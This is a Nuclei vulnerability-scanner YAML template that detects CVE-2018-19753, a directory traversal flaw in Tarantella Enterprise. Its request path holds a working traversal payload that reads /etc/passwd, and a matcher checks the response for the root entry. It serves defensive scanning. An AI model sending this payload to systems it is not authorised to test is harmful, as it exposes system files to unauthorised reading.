nuclei-templates/cves/2018/CVE-2018-19753.yaml

36 lines
940 B
YAML

id: CVE-2018-19753
info:
name: Tarantella Enterprise <3.11 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.
reference:
- https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-19753
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19753
cwe-id: CWE-22
tags: cve,cve2018,tarantella,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/13